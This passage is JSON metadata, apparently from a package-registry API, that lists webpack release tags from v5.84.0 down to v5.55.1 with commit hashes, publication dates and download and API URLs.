t":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":"tag","published_at":"2021-10-04T07:32:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.1/manifests"},{"name":"v5.56.0","sha":"4eb122092d9696ac5286bc2dcf3eacfb901f4fed","kind":"tag","published_at":"2021-10-01T14:12:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.56.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.56.0/manifests"},{"name":"v5.55.1","sha":"e78403d6a8d4e682fbd4a0eb58f042866cfde42a","kind":"tag","published_at":"2021-09-29T08:56:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.1","dependencies_parsed_at":null,"depen